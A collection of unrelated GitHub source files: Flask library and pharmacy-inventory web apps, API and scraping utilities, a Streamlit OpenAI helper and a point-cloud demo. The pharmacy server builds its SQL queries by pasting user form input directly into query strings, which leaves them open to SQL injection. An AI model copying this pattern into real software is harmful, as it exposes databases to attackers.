results = r.json().get('images', [])
return [Image(**item) for item in results]
def get_image_id_by_url(self, url, try_upload=None, timeout=2, default=None) -> Optional[str]:
"""
Try to get image id from local storage or quickly upload it
or return the default image.
"""
if url in self.url2image:
return self.url2image[url].id
if try_upload is None:
try_upload = self.upload_just_in_time
if try_upload:
image = self.add_image(url, timeout=timeout)
if image:
return image.id
if default:
return default
if self.default_image_id:
return self.default_image_id
def get_quota(self):
""" Get existing an occupied amount of storage for images and sounds in bytes"""
r = requests.get(
url='https://dialogs.yandex.net/api/v1/status',
headers={'Authorization': 'OAuth {}'.format(self.token)}
)
return r.json()
def delete_image(self, image_id):
""" Delete image from storage by its id and delete it from local index """
r = requests.delete(
url='https://dialogs.yandex.net/api/v1/skills/{}/images/{}'.format(self.skill_id, image_id),
headers={'Authorization': 'OAuth {}'.format(self.token)}
)
if r.ok:
if image_id in self.id2image:
image = self.id2image[image_id]
del self.id2image[image_id]
if image.origUrl in self.url2image and self.url2image[image.origUrl].id == image_id:
del self.url2image[image.origUrl]
return r.json()
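# Usage sketch (token/skill_id/url are placeholders, not real values):
# api = YandexImageAPI(token="...", skill_id="...", upload_just_in_time=True)
# api.update_images()
# image_id = api.get_image_id_by_url("https://example.com/pic.png")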
|
avidale/dialogic
|
dialogic/utils/content_manager.py
|
content_manager.py
|
py
| 4,070 |
python
|
en
|
code
| 22 |
github-code
|
6
|
797067392
|
from flask import Blueprint, render_template, url_for, flash, redirect, request, abort
from flask_login import login_user, current_user, logout_user, login_required
from app import db, bcrypt
from app.forms import LoginForm, RegistrationForm, AddBookForm, UpdateBookForm
from app.models import User, Book, BookListBook, BookSerie, BorrowedBook
routes = Blueprint('routes', __name__)
# User-related routes
@routes.route('/login', methods=['GET', 'POST'])
def login():
if current_user.is_authenticated:
return redirect(url_for('routes.index'))
form = LoginForm()
if form.validate_on_submit():
user = User.query.filter_by(email=form.email.data).first()
print("User found:", user) # Debugging statement
if user and bcrypt.check_password_hash(user.password, form.password.data):
print("Password matches") # Debugging statement
login_user(user, remember=form.remember_me.data)
next_page = request.args.get('next')
return redirect(next_page) if next_page else redirect(url_for('routes.book_list'))
else:
flash('Login Unsuccessful. Please check email and password', 'danger')
else:
print("Form not validated:", form.errors) # Debugging statement
return render_template('login.html', title='Login', form=form)
@routes.route('/register', methods=['GET', 'POST'])
def register():
if current_user.is_authenticated:
return redirect(url_for('routes.index'))
form = RegistrationForm()
if form.validate_on_submit():
hashed_password = bcrypt.generate_password_hash(form.password.data).decode('utf-8')
user = User(username=form.username.data, email=form.email.data, password=hashed_password)
db.session.add(user)
db.session.commit()
flash('Your account has been created! You can now log in', 'success')
return redirect(url_for('routes.login'))
return render_template('register.html', title='Register', form=form)
@routes.route('/logout')
def logout():
logout_user()
return redirect(url_for('routes.index'))
# Book-related routes
@routes.route('/')
@routes.route('/index')
@login_required
def index():
print("Authenticated:", current_user.is_authenticated)
books = Book.query.all()
return render_template('index.html', books=books)
@routes.route('/book_list')
@login_required
def book_list():
books = Book.query.all()
return render_template('book_list.html', books=books)
@routes.route('/book_detail/<int:book_id>')
@login_required
def book_detail(book_id):
book = Book.query.get_or_404(book_id)
return render_template('book_detail.html', book=book)
# Add, update, and delete book routes from previous response
@routes.route('/book_add', methods=['GET', 'POST'])
@login_required
def book_add():
form = AddBookForm()
if form.validate_on_submit():
book = Book(title=form.title.data, author=form.author.data)
db.session.add(book)
db.session.commit()
        flash('Your book was added successfully!', 'success')
return redirect(url_for('routes.index'))
    return render_template('book_add.html', title='Add a book', form=form)
@routes.route('/book_update/<int:book_id>', methods=['GET', 'POST'])
@login_required
def book_update(book_id):
book = Book.query.get_or_404(book_id)
if not current_user.is_admin:
abort(403)
form = UpdateBookForm()
if form.validate_on_submit():
book.title = form.title.data
book.author = form.author.data
db.session.commit()
        flash('Your book was updated successfully!', 'success')
return redirect(url_for('routes.book_detail', book_id=book.id_book))
elif request.method == 'GET':
form.title.data = book.title
form.author.data = book.author
    return render_template('book_update.html', title='Edit a book', form=form, book=book)
@routes.route('/book_delete/<int:book_id>', methods=['POST'])
@login_required
def book_delete(book_id):
book = Book.query.get_or_404(book_id)
if not current_user.is_admin:
abort(403)
    # delete the associated entries in the BookListBook table
book_list_books = BookListBook.query.filter_by(book_id=book.id_book).all()
for book_list_book in book_list_books:
db.session.delete(book_list_book)
    # delete the associated entries in the BookSerie table
book_series = BookSerie.query.filter_by(book_id=book.id_book).all()
for book_serie in book_series:
db.session.delete(book_serie)
    # delete the associated entries in the BorrowedBook table
borrowed_books = BorrowedBook.query.filter_by(book_id=book.id_book).all()
for borrowed_book in borrowed_books:
db.session.delete(borrowed_book)
    # delete the book itself
db.session.delete(book)
db.session.commit()
    flash('Your book was deleted successfully!', 'success')
return redirect(url_for('routes.index'))
# Error handlers
# (note: Blueprint.errorhandler only fires for errors raised inside this
#  blueprint; use routes.app_errorhandler for app-wide 404/403/500 pages)
@routes.errorhandler(404)
def not_found_error(error):
return render_template('404.html'), 404
@routes.errorhandler(403)
def forbidden_error(error):
return render_template('403.html'), 403
@routes.errorhandler(500)
def internal_error(error):
db.session.rollback()
return render_template('500.html'), 500
|
AdrienDEBREUILLY/Library_perso_and_family
|
app/routes.py
|
routes.py
|
py
| 5,345 |
python
|
en
|
code
| 0 |
github-code
|
6
|
30914361148
|
import streamlit as st
import openai
openai.api_key = st.secrets["OPENAI_API_KEY"]
def write_page_config():
st.set_page_config(
page_title="AI 서비스 개발하기",
page_icon="🧠"
)
def request_chat_completion(prompt, stream=False, system_role=None):
messages = [{"role": "user", "content": prompt}]
if system_role:
messages = [{"role": "system", "content": system_role}] + messages
response = openai.ChatCompletion.create(
model="gpt-3.5-turbo",
messages=messages,
stream=stream
)
return response
def write_streaming_response(response):
message = ""
placeholder = st.empty()
for chunk in response:
delta = chunk.choices[0]["delta"]
if "content" in delta:
message += delta["content"]
placeholder.markdown(message + "▌")
else:
break
placeholder.markdown(message)
return message
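# Usage sketch (assumes this runs inside a Streamlit page with a valid key in secrets):
# response = request_chat_completion("Say hello", stream=True, system_role="Be brief.")
# message = write_streaming_response(response)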
|
yeomko22/useful_chatgpt
|
common.py
|
common.py
|
py
| 948 |
python
|
en
|
code
| 0 |
github-code
|
6
|
32275396284
|
import torch
from torch.utils.data import Dataset
from torchvision.datasets import ImageFolder
import torchvision.transforms as transforms
import os
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
class TabularDataset(Dataset):
def __init__(
self,
dataset: str or pd.DataFrame,
atts: list,
root: str = "data/clean",
target: str = "TARGET",
set: str = "train",
pred: bool = False,
split: bool = False,
test_perc: float = 0.1,
device: str = "cuda:0",
):
"""
:param dataset: str or Pandas.DataFrame
:param atts: list
The names of features.
:param root:
The path to data. Ignored if dataset is a Pandas.DataFrame.
:param target:
The name of target variable. The default is 'TARGET'.
:param set:
The set to which we are referring. Ignored if dataset is a Pandas DataFrame.
:param pred: bool
It determines whether the target variable is seen or not. The default is False.
:param device:
"""
super(TabularDataset, self).__init__()
if type(dataset) == str:
self.path = os.path.join(root, dataset, dataset + "_" + set + ".csv")
self.df = pd.read_csv(self.path)
elif type(dataset) == pd.DataFrame:
self.df = dataset
self.cat_atts = list(
self.df[atts].select_dtypes(include=["object", "category"]).columns
)
self.cont_atts = list(
self.df[atts].select_dtypes(exclude=["object", "category"]).columns
)
for col in self.cat_atts:
self.df[col] = self.df[col].astype("category").cat.codes
for col in self.cont_atts:
self.df[col] = self.df[col].astype(float)
self.pred = pred
if torch.cuda.is_available():
self.device = device
else:
self.device = "cpu"
print("Cuda is not available. The device is set to cpu.")
self.x_num = (
torch.from_numpy(self.df[self.cont_atts].values).float().to(self.device)
)
self.x_cat = (
torch.from_numpy(self.df[self.cat_atts].values).to(self.device).long()
)
self.data = torch.cat([self.x_num, self.x_cat], dim=1)
if self.pred is False:
self.y = torch.from_numpy(self.df[target].values).to(self.device)
self.targets = self.df[target].values
self.classes = np.unique(self.df[target])
def __getitem__(self, index):
if self.pred:
return self.x_num[index], self.x_cat[index]
else:
return self.x_num[index], self.x_cat[index], self.y[index], index
def __len__(self):
return self.data.shape[0]
class ImgFolder(ImageFolder):
def __getitem__(self, index):
x, y = super().__getitem__(index)
return x, y, index
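# Usage sketch (dataset name, feature columns, and CSV layout are assumptions):
# ds = TabularDataset("adult", atts=["age", "workclass"], target="TARGET", set="train")
# x_num, x_cat, y, idx = ds[0]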
|
cmougan/SelectiveRegression
|
tools/datasets.py
|
datasets.py
|
py
| 3,006 |
python
|
en
|
code
| 2 |
github-code
|
6
|
33526625463
|
# Write a program that plays odd-or-even against the computer. The game is only
# interrupted when the player loses, showing the total of consecutive wins at the end.
from random import randint
vitórias=0
while True:
escolha=input("Você quer par ou ímpar?(DIGITE PAR OU ÍMPAR)").upper()
jogador=int(input("Escolha um número entre 0 e 10:"))
computador=randint(0,10)
soma=computador+jogador
if escolha=="ÍMPAR":
if soma%2==0:
print("Você perdeu. TENTE NOVAMENTE.")
print(f"Deu par!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
break
elif soma%2==1:
vitórias+=1
print("PARABÉNS!!! Você ganhou.")
print(f"Deu ímpar!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
continue
elif escolha=="PAR":
if soma%2==0:
vitórias+=1
print("PARABÉNS!!! Você ganhou.")
print(f"Deu par!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
continue
elif soma%2==1:
print("Você perdeu. TENTE NOVAMENTE.")
print(f"Deu ímpar!!! Você escolheu {jogador} e o computador escolheu {computador}, resultando em {soma}.")
break
print(f"Você conseguiu {vitórias} vitória(s) consecutiva(s).")
|
cauavsb/python
|
mundo-2-py/ex33.py
|
ex33.py
|
py
| 1,455 |
python
|
pt
|
code
| 0 |
github-code
|
6
|
24582961875
|
import os
# accessible as a variable in index.html:
from sqlalchemy import *
from sqlalchemy.pool import NullPool
from flask import Flask, request, render_template, g, redirect, Response
from flask import redirect, url_for
tmpl_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'templates')
app = Flask(__name__, template_folder=tmpl_dir)
DATABASE_USERNAME = "yw3930"
DATABASE_PASSWRD = "3089"
DATABASE_HOST = "34.148.107.47" # change to 34.28.53.86 if you used database 2 for part 2
DATABASEURI = f"postgresql://{DATABASE_USERNAME}:{DATABASE_PASSWRD}@{DATABASE_HOST}/project1"
engine = create_engine(DATABASEURI)
#
# try:
# connection = engine.connect()
# # get column names and data for drug table
# select_query = "SELECT * FROM drug;"
# result = connection.execute(text(select_query))
# columns = result.keys()
# data = result.fetchall()
# print("Columns in drug table:")
# print(columns)
# print("Data in drug table:")
# for row in data:
# print(row)
#
# print('---------------------------------------')
#
# # get column names and data for pharmacy_storage table
# select_query = "SELECT * FROM pharmacy_storage;"
# result = connection.execute(text(select_query))
# columns = result.keys()
# data = result.fetchall()
# print("Columns in pharmacy_storage table:")
# print(columns)
# print("Data in pharmacy_storage table:")
# for row in data:
# print(row)
# connection.close()
#
# except Exception as e:
# print(f"Error connecting to database: {e}")
@app.before_request
def before_request():
"""
This function is run at the beginning of every web request
(every time you enter an address in the web browser).
We use it to setup a database connection that can be used throughout the request.
The variable g is globally accessible.
"""
try:
g.conn = engine.connect()
except:
print("uh oh, problem connecting to database")
import traceback; traceback.print_exc()
g.conn = None
@app.teardown_request
def teardown_request(exception):
"""
At the end of the web request, this makes sure to close the database connection.
If you don't, the database could run out of memory!
"""
try:
g.conn.close()
except Exception as e:
pass
@app.route('/')
def home():
return render_template('home.html')
@app.route('/search', methods=['POST'])
def search():
drug_id = request.form['drug_id']
select_query = "SELECT * FROM pharmacy_storage WHERE drug_id = " + str(drug_id)
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
return render_template("error.html", drug_id=drug_id)
else:
results = [result for result in cursor]
cursor.close()
# print(results)
return render_template("drug_information.html", drug_id=drug_id, drug_name=results[0][0], category=results[0][1], safety_stock=results[0][2], dosage=results[0][3])
@app.route('/add_drug', methods=['GET', 'POST'])
def add_drug():
if request.method == 'POST':
# get form data
drug_id = request.form['drug_id']
drug_name = request.form['drug_name']
quantity = int(request.form['quantity'])
expire_date = request.form['expire_date']
# check if drug exists in drug table
select_query = f"SELECT * FROM drug WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}'"
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
cursor.close()
error_message = f"Drug with ID '{drug_id}' or name '{drug_name}' does not exist in the database."
return render_template("error.html", error_message=error_message)
# check if drug exists in pharmacy storage
select_query = f"SELECT * FROM pharmacy_storage WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
cursor = g.conn.execute(text(select_query))
if cursor.rowcount:
# if drug exists in storage with same expiration date, add quantity
results = [result for result in cursor]
print(results)
new_quantity = int(results[0][5]) + int(quantity)
update_query = f"UPDATE pharmacy_storage SET quantity = {new_quantity} WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
g.conn.execute(text(update_query))
else:
# if drug doesn't exist in storage, add new record
insert_query = f"INSERT INTO pharmacy_storage (drug_id, drug_name, expire_date, quantity) VALUES ('{drug_id}', '{drug_name}', '{expire_date}', {quantity})"
g.conn.execute(text(insert_query))
cursor.close()
# render updated pharmacy storage page
select_query = "SELECT * FROM pharmacy_storage ORDER BY drug_id, drug_name, expire_date"
cursor = g.conn.execute(text(select_query))
storage_results = [result for result in cursor]
cursor.close()
g.conn.commit()
return render_template("pharmacy_storage.html", storage_results=storage_results)
else:
return render_template("add_drug.html")
@app.route('/take_drug', methods=['GET', 'POST'])
def take_drug():
if request.method == 'POST':
# get form data
drug_id = request.form['drug_id']
drug_name = request.form['drug_name']
quantity = int(request.form['quantity'])
expire_date = request.form['expire_date']
# check if drug exists in drug table
select_query = f"SELECT * FROM drug WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}'"
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
cursor.close()
error_message = f"Drug with ID '{drug_id}' or name '{drug_name}' does not exist in the database."
return render_template("error.html", error_message=error_message)
# check if drug exists in pharmacy storage
select_query = f"SELECT * FROM pharmacy_storage WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
cursor = g.conn.execute(text(select_query))
if not cursor.rowcount:
cursor.close()
error_message = f"Drug with ID '{drug_id}', name '{drug_name}', and expiration date '{expire_date}' does not exist in the pharmacy storage."
return render_template("error.html", error_message=error_message)
results = [result for result in cursor]
cursor.close()
# check if quantity is sufficient
if int(results[0][5]) < quantity:
error_message = f"Insufficient quantity of drug with ID '{drug_id}', name '{drug_name}', and expiration date '{expire_date}' in the pharmacy storage."
return render_template("error.html", error_message=error_message)
# calculate new quantity and update database
new_quantity = int(results[0][5]) - quantity
if new_quantity < 0:
error_message = f"Invalid quantity of drug with ID '{drug_id}', name '{drug_name}', and expiration date '{expire_date}'. Quantity after taking cannot be less than 0."
return render_template("error.html", error_message=error_message)
elif new_quantity == 0:
delete_query = f"DELETE FROM pharmacy_storage WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
g.conn.execute(text(delete_query))
else:
update_query = f"UPDATE pharmacy_storage SET quantity = {new_quantity} WHERE drug_id = '{drug_id}' and drug_name = '{drug_name}' and expire_date = '{expire_date}'"
g.conn.execute(text(update_query))
# render updated pharmacy storage page
select_query = "SELECT * FROM pharmacy_storage ORDER BY drug_id, drug_name, expire_date"
cursor = g.conn.execute(text(select_query))
storage_results = [result for result in cursor]
cursor.close()
g.conn.commit()
return render_template("pharmacy_storage.html", storage_results=storage_results)
else:
return render_template("take_drug.html")
@app.route('/pharmacy_storage')
def pharmacy_storage():
select_query = "SELECT * FROM pharmacy_storage;"
cursor = g.conn.execute(text(select_query))
storage_results = [result for result in cursor]
cursor.close()
return render_template('pharmacy_storage.html', storage_results=storage_results)
if __name__ == "__main__":
import click
@click.command()
@click.option('--debug', is_flag=True)
@click.option('--threaded', is_flag=True)
@click.argument('HOST', default='0.0.0.0')
@click.argument('PORT', default=8111, type=int)
def run(debug, threaded, host, port):
HOST, PORT = host, port
print("running on %s:%d" % (HOST, PORT))
app.run(host=HOST, port=PORT, debug=debug, threaded=threaded)
run()
|
YueWang417/w4111-proj1-group69
|
webserver/server.py
|
server.py
|
py
| 9,229 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33645813981
|
# -*- coding: utf-8 -*-
import os
import importlib
import yaml
# Library imports: communication with web servers
import json
import requests
from requests.exceptions import ConnectionError
from WebService import *
import re as regex
from PyQt5 import QtWidgets
from PyQt5.QtCore import *
import time
from OS_define import OS_define
from datetime import datetime
from pathlib import Path
import sys
import platform
import logging
global logger
logger=logging.getLogger()
logger.setLevel(logging.DEBUG)
class ApiManager:
script_location = Path(__file__).absolute().parent
def __init__(self, FilePath = script_location / 'Apis.yml'):
with open(FilePath, 'r') as ymlfile:
            cfg = yaml.load(ymlfile, Loader=yaml.SafeLoader)
self.OJT = WebService(cfg['OJT'])
self.AIO = WebService(cfg['AIO'])
self.AIO_Dashboard = WebService(cfg['AIO_Dashboard'])
#self.JMD = WebService(cfg['JMD'])
def Request(self, webServiceObject, functionName, parameterObject):
if isinstance(webServiceObject, WebService):
for prop in webServiceObject._WebService__yamlContents:
for key in webServiceObject._WebService__yamlContents[prop]:
if (prop=='baseUrl'):
continue
if (regex.match(functionName, key, regex.I|regex.M)):
endPoint = webServiceObject._WebService__baseUrl+prop+"/"+key+"/";
RequestType = webServiceObject._WebService__yamlContents[prop][key]['Type'];
ArgumentsCount = webServiceObject._WebService__yamlContents[prop][key]['ArgumentsCount'];
print("##########")
print ("link: " + endPoint+str(parameterObject))
try:
if (regex.match(RequestType, 'Post', regex.I|regex.M)):
response = requests.post(endPoint, parameterObject)
print(response.elapsed.total_seconds())
print("##########")
return response.json();
elif (regex.match(RequestType, 'Get', regex.I|regex.M)):
response = requests.get(endPoint+parameterObject)
if (response.status_code==200):
print(response.elapsed.total_seconds())
print("##########")
return response.json()
                                elif (response.status_code==404):
                                    print("API Call " + endPoint+parameterObject + " returned a status code " + str(response.status_code))
                                else:
                                    print("API Call " + endPoint+parameterObject + " returned a status code " + str(response.status_code))
                                    return response;
pass
else:
raise Exception("API Type parameter undefined.")
except ConnectionError as e:
print("No internet connection to perform Api Call " + endPoint + parameterObject + " Error:" + type(e).__name__)
importlib.reload(requests)
return type(e).__name__
except Exception as e:
#except:
print("Exception while calling API " + endPoint + " Type: " + type(e).__name__)
# returnData = requests.post(endPoint, "")
# return returnData;
return
raise Exception("Undefined API Function: " + functionName)
else:
raise Exception("Given object is not a WebService object");
return "Problem"
def GetSingleValueFromJsonObject(self, jsonObject, key, raiseException):
result = jsonObject.get(key, "Not found");
        if (raiseException and result == "Not found"):
            raise Exception("The key: " + key + " does not exist in the object")
return result;
def load_LPA(self,BadgeID,Workstep,RouteID):
baseUrl = 'http://**************01/LPAEletronico/Lpa/Login?registration='
if (str(RouteID)=="187" or str(RouteID)=="168" or str(RouteID)=="23" or str(RouteID)=="13" or str(RouteID)=="20" or str(RouteID)=="26" or str(RouteID)=="197"):
baseUrl = baseUrl + str(BadgeID) + '&idworkline=' + str(RouteID)
elif(str(RouteID)=="152" or str(RouteID)=="153" or str(RouteID)=="200" or str(RouteID)=="208" or str(RouteID)=="205"):
baseUrl = 'http://**************01/LPAVLS/Lpa/Login?registration='
baseUrl = baseUrl + str(BadgeID) + '&idworkstep=' + str(Workstep)
else:
baseUrl = baseUrl + str(BadgeID) + '&idworkstep=' + str(Workstep)
print("LPA URL addres: " + baseUrl)
return baseUrl
def load_Jiga(self,lineId):
baseUrl = 'http://**************01/SCTC/Dashboard/ToolingDashboard.aspx?areaId=3&lineId='
baseUrl = baseUrl + str(lineId)
return baseUrl
def load_BI(self,BadgeID,StationID):
print("workstation id:" + str(StationID))
userIdurl = "http://**************02/AIOService/Jmd/GetUserDetailsByRegistration/" + BadgeID
r = requests.get(userIdurl)
response = r.json()
userId = response['idUser']
baseUrl = 'http://**************01/GoodIdeas/GoodIdea/NewIdea?registration=' + str(BadgeID) + '&menuCollapse=true'
print("BI URL addres: " + baseUrl)
return baseUrl
def load_lineName(self,stationId):
baseUrl = 'http://**************02/JMDDataServices/workstation/'
baseUrl = baseUrl + str(stationId) + '/productionlines'
response = requests.get(baseUrl)
return response.json()
def load_FI(self,Workstation):
from PyQt5.QtWebEngineCore import QWebEngineHttpRequest
self.url = QUrl()
self.req = QWebEngineHttpRequest()
self.url.setScheme("http")
self.url.setHost("**************01")
self.url.setPath("/FICreator/FIViewer/SlideShow")
self.req.setUrl(self.url)
self.req.setMethod(QWebEngineHttpRequest.Post)
self.req.setHeader(QByteArray(b'Content-Type'),QByteArray(b'application/json'))
parametros = {"workstation": Workstation, "prodashSync": True, "time": 5}
self.req.setPostData(bytes(json.dumps(parametros), 'utf-8'))
return self.req
def load_5s(self,Workstation):
baseUrl = 'http://**************99/AIOServiceSTG/Images5S/GetAll?query='
baseUrl = baseUrl + str(Workstation)
print("###########")
logger.error(baseUrl)
try:
response = requests.get(baseUrl)
logger.error(response.json())
return response.json();
except Exception as e:
print("Erro API 5s:: " + type(e).__name__)
logger.error("Erro API 5s:: " + type(e).__name__)
return
def custom_button(self,Area,AreaTrim,Route,Index):
if(Area=="INGCUS" and Index==1):
baseUrl="http://*******/CNCSWebApiPersona/OrMonitor?hostName="
baseUrl = baseUrl + str(Route)
print("OR MONITOR URL: " + baseUrl)
logger.error("OR MONITOR URL: " + baseUrl)
elif(AreaTrim=="REP"):
baseUrl="http://*******m0itqa01/TestPortal/pages/MesWipReport.aspx"
logger.error("LINK TEST WIP REPARO: " + baseUrl)
else:
baseUrl = 'about:blank'
return baseUrl
|
Jhonatan-Avelar/aioJhonatan
|
jhonatanaio/script/ApiManager.py
|
ApiManager.py
|
py
| 8,318 |
python
|
en
|
code
| 0 |
github-code
|
6
|
33645832811
|
# -*- coding: utf-8 -*-
import yaml
import os
from pathlib import Path
class GlobalParameters:
script_location = Path(__file__).absolute().parent
def __init__(self, FilePath = script_location / 'GlobalParameters.yml'):
# Load the yml config file
with open(FilePath, 'r') as ymlfile:
            cfg = yaml.load(ymlfile, Loader=yaml.SafeLoader)
# Set the display parameters
self.Screen_Width = cfg['Screen']['Width'];
self.Screen_Height = cfg['Screen']['Height'];
self.Screen_FullSreen = cfg['Screen']['FullSreen'];
# Set the thread parameters
self.BadgeReader_MininumGoodReads = cfg['BadgeReader']['MinimumGoodsReads'];
self.BadgeReader_ThreadTime = cfg['BadgeReader']['BadgeReadFrequency'];
# Set the All in One Current Version
self.AIO_Version = cfg['Version']['Actual'];
|
Jhonatan-Avelar/aioJhonatan
|
jhonatanaio/script/GlobalParameters.py
|
GlobalParameters.py
|
py
| 862 |
python
|
en
|
code
| 0 |
github-code
|
6
|
23854746715
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.home, name='home'),
path('setup', views.setup, name='setup'),
path('about', views.about, name='about'),
path('real_record', views.real_record, name='real_record'),
path('result', views.result, name='result'),
]
|
CHELSEYliuqy/Robo-Website
|
Robo/Optimizer/urls.py
|
urls.py
|
py
| 313 |
python
|
en
|
code
| 0 |
github-code
|
6
|
21965282646
|
import argparse
import glob
from pathlib import Path
import numpy as np
import torch
from pcdet.config import cfg, cfg_from_yaml_file
from pcdet.datasets import DatasetTemplate
from pcdet.models import build_network, load_data_to_gpu
from pcdet.utils import common_utils
class DemoDataset(DatasetTemplate):
def __init__(self, dataset_cfg, class_names, training=True, root_path=None, logger=None, ext='.bin'):
"""
Args:
root_path:
dataset_cfg:
class_names:
training:
logger:
"""
super().__init__(
dataset_cfg=dataset_cfg, class_names=class_names, training=training, root_path=root_path, logger=logger
)
#print(dataset_cfg.DATA_AUGMENTOR)
self.use_data_type = dataset_cfg.DATA_AUGMENTOR.get('USE_DATA_TYPE', None)
self.root_path = root_path
self.ext = ext
data_file_list = glob.glob(str(root_path / f'*{self.ext}')) if self.root_path.is_dir() else [self.root_path]
data_file_list.sort()
self.sample_file_list = data_file_list
def __len__(self):
return len(self.sample_file_list)
def __getitem__(self, index):
if self.ext == '.bin':
print(self.use_data_type)
if self.use_data_type == 'lidar':
points = np.fromfile(self.sample_file_list[index], dtype=np.float32).reshape(-1, 6)
#points = points[:,:4]
else:
points = np.fromfile(self.sample_file_list[index], dtype=np.float32).reshape(-1, 5)
#points = points[:,:4]
elif self.ext == '.npy':
points = np.load(self.sample_file_list[index])
else:
raise NotImplementedError
input_dict = {
'points': points,
'frame_id': index,
}
data_dict = self.prepare_data(data_dict=input_dict)
return data_dict
def parse_config():
parser = argparse.ArgumentParser(description='arg parser')
parser.add_argument('--cfg_file', type=str, default='/ai/volume/Dual-Radar-master/tools/cfgs/dual_radar_models/pointpillar_lidar.yaml',
help='specify the config for demo')
parser.add_argument('--data_path', type=str, default='/ai/volume/Dual-Radar-master/data/dual_radar/lidar/training/velodyne/000000.bin',
help='specify the point cloud data file or directory')
parser.add_argument('--ckpt', type=str, default='/ai/volume/Dual-Radar-master/models/pointpillars_liadr_80.pth', help='specify the pretrained model')
parser.add_argument('--ext', type=str, default='.bin', help='specify the extension of your point cloud data file')
args = parser.parse_args()
cfg_from_yaml_file(args.cfg_file, cfg)
return args, cfg
def main():
args, cfg = parse_config()
logger = common_utils.create_logger()
logger.info('-----------------Quick Demo of OpenPCDet-------------------------')
demo_dataset = DemoDataset(
dataset_cfg=cfg.DATA_CONFIG, class_names=cfg.CLASS_NAMES, training=False,
root_path=Path(args.data_path), ext=args.ext, logger=logger
)
with torch.no_grad():
for idx, data_dict in enumerate(demo_dataset):
logger.info(f'Visualized sample index: \t{idx + 1}')
data_dict = demo_dataset.collate_batch([data_dict])
load_data_to_gpu(data_dict)
logger.info('Demo done.')
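# --- sketch (not in the original file): main() above parses --ckpt but never
# builds the network; this is how the checkpoint would typically be consumed
# with the stock OpenPCDet demo flow. build_network / load_params_from_file
# are assumptions based on that library, not code from this repo. ---
def build_and_load_model(args, cfg, demo_dataset, logger):
    model = build_network(model_cfg=cfg.MODEL, num_class=len(cfg.CLASS_NAMES), dataset=demo_dataset)
    model.load_params_from_file(filename=args.ckpt, logger=logger, to_cpu=True)
    model.cuda()
    model.eval()
    return model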
if __name__ == '__main__':
main()
|
adept-thu/Dual-Radar
|
tools/demo_text.py
|
demo_text.py
|
py
| 3,490 |
python
|
en
|
code
| 62 |
github-code
|
6
|
10418893375
|
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
from selenium.common.exceptions import NoSuchElementException
from webdriver_manager.chrome import ChromeDriverManager
from selenium.common.exceptions import ElementNotInteractableException
from dash import html
from parsel import Selector
from selenium.webdriver.common.action_chains import ActionChains
from selenium.common.exceptions import TimeoutException
import re
import time
import json
import sys
from selenium.common.exceptions import StaleElementReferenceException
import traceback
from multiprocessing import Pool
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.chrome.options import Options
from concurrent.futures.thread import ThreadPoolExecutor
import selenium_async
import asyncio
import atexit
executor = ThreadPoolExecutor(10)
def initialize_driver():
chrome_options = Options()
# Run in headless mode. Comment this line if you want to see the browser actions
chrome_options.add_argument("--headless")
chrome_options.add_argument("--no-sandbox")
chrome_options.add_argument("--disable-dev-shm-usage")
# Initialize the Chrome driver
driver = webdriver.Chrome(service=Service(ChromeDriverManager().install()), options=chrome_options)
return driver
driver = initialize_driver()
def scrollDownLeftMenuOnGoogleMaps(waitingTime):
try:
menu_xpath = '/html/body/div[3]/div[9]/div[9]/div/div/div[1]/div[2]/div[1]/div[1]/div[1]'
WebDriverWait(driver, waitingTime).until(
EC.visibility_of_element_located((By.XPATH, menu_xpath)))
element = driver.find_element("xpath", menu_xpath)
driver.execute_script("arguments[0].scrollIntoView();", element)
except TimeoutException:
print("Timeout for scrollDownLeftMenuOnGoogleMaps")
def getPhone(htmlCode):
phone = ""
phoneEl = htmlCode.xpath(
'//button[contains(@data-tooltip, "Copy phone number")]')
if phoneEl and len(phoneEl) > 0:
phoneStr = phoneEl[0].xpath('@data-item-id').extract_first('')
if phoneStr:
numbers = ''.join(c for c in phoneStr if c.isdigit())
if numbers.startswith('0'):
numbers = '+62' + numbers[1:]
phone = numbers
return phone
def getPrice(htmlCode):
price = 0
element = htmlCode.xpath('//button[@aria-haspopup="dialog" and @class="Tc0rEd fT414d plVN2c "]')
if element and len(element) > 0:
aria_label = element[0].attrib.get('aria-label', '')
price_match = re.search(r'IDR\s+([\d,]+)', aria_label)
if price_match:
price_str = price_match.group(1).replace(',', '')
try:
price = int(price_str)
return price
except ValueError:
return 0
return price
def getCheckout(htmlCode):
result = ""
element = htmlCode.xpath(
'//div[contains(@data-item-id, "place-info-links:")]')
if element and len(element) > 0:
        text_sel = element[0].xpath('.//div[2]/div[1]/span/text()')
        result = text_sel.get()
return result
def getMenu(htmlCode):
result = ""
element = htmlCode.xpath(
'//a[contains(@data-tooltip, "Open menu link")]')
if element and len(element) > 0:
valueStr = element[0].xpath('@href').extract_first('')
result = valueStr
return result
def extract_price(price_str):
non_decimal = ''.join(ch for ch in price_str if ch.isdigit())
try:
return int(non_decimal)
except ValueError:
return 0
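# e.g. extract_price("IDR 1,250,000") == 1250000; input with no digits returns 0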
def getAboutData():
price = 0
star_rating = ""
all_text = ""
try:
element = WebDriverWait(driver, 5).until(EC.element_to_be_clickable(
(By.XPATH, '//button[.//div[contains(text(), "About")]]')))
if element:
element.click()
price_element = WebDriverWait(driver, 5).until(EC.visibility_of_element_located(
(By.XPATH, '//div[@class="s35xed"]//li[@class="OyY9Kc"]/span')))
if price_element:
